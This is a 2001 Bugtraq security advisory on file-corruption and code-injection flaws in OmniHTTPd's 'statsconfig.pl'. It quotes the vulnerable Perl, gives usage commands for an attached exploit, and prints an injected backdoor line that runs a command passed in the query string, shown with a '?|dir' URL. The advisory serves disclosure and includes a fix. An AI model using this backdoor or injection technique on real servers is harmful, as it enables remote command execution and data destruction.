Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Vulnerabilities in OmniHTTPd default installation

From: joetesta () HUSHMAIL COM
Date: Mon, 15 Jan 2001 17:19:12 -0800
Vulnerabilities in OmniHTTPd default installation



    Overview

Two vulnerabilities exist within the 'statsconfig.pl' script that
comes with OmniHTTPd v2.07 and is installed by default.  The first
allows a remote attacker to corrupt any file in the system.  The second
allows arbitrary code to be inserted into '/cgi-bin/stats.pl'.



    Details

Here is the offending code:


    if ($FORM{'mostbrowsers'}) {
        $mostbrowsers_str = '$most_browsers = "' .
                                          $FORM{'mostbrowsers'} . '";';
    }

    ...

    unless (-f "$FORM{'cgidir'}/stats.prg") {
        $error .= "<LI>Config couldn't find the file stats.prg in
                                              your cgi-bin directory.";
        [ exit(); ]
    }

    ...

    $cgifile = "$FORM{'cgidir'}/stats.pl";
    $progfile = "$FORM{'cgidir'}/stats.prg";

    open(CGI, "> $cgifile");
    open(PROG, "$progfile");

    print CGI "#!/usr/local/bin/perl5\n";
    print CGI "#AutoConfiged by Statsconfig.pl\n\n";
    print CGI 
"$deflimit_str\n$mostip_str\n$mostreq_str\n$mostbrowsers_str\n$timelog_str\n$mostipnum_str\n$mostreqf_str\n$mostbrowsernum_str\n$logloc_str\n$imagebar_str\n$serveradd_str\n$barwidth_str\n$barheight_str\n$listpass_str\n$bgcolor_str\n$bgimage_str\n$ttBGcolor_str\n\n$perllib_str\n";

    ...


    None of the variables in %FORM are filtered.  An attacker simply
sets $FORM{'cgidir'} to the absolute path of any file in the system
(padded with a null, of course), and that file will be corrupted.  Note
that because absolute file names are used, this exploit is not
restricted to the drive the webserver resides on.
    Code injection is achieved by setting $FORM{'mostbrowsers'} to any
legal value, followed by a semicolon and the payload.


    Exploit

I've written an exploit in PERL to demonstrate the two vulnerabilities.
    To corrupt a file:

        perl omnismash.pl localhost 80 -corrupt c:/autoexec.bak

    The file you choose will be overwritten with approximately 470
bytes of PERL code.
    To inject code into '/cgi-bin/stats.pl':

        perl omnismash.pl localhost 80 -inject c:/httpd/cgi-bin

    You must pass the absolute path to the cgi-bin directory for this
to work.  This exploit is hard-coded to insert the following line:

        if( $ENV{'QUERY_STRING'} ) { open( QS,$ENV{'QUERY_STRING'} ); }

    With that done, point your browser to
'http://localhost/cgi-bin/stats.pl?|dir'.  You will see a directory
listing of '/cgi-bin'.




    Solution

Erase 'statsconfig.pl' along with any other unnecessary files in your
'cgi-bin'.  If this is not possible in your particular situation,
replace your current 'statsconfig.pl' file with the attached
'statsconfig.fixed' file.  This version allows 'statsconfig.pl' to be
invoked only from localhost.




    Vendor Status

Omnicron Technologies Corporation was notified via
<info () omnicron ab ca> and <support () omnicron ab ca> on Monday,
January 8, 2001.  No reply was received.
Free, encrypted, secure Web-based email at www.hushmail.com

Attachment: 2000.01.08.OmniHTTPd.zip
Description:

Previous By Date Next
Previous By Thread Next

Current thread: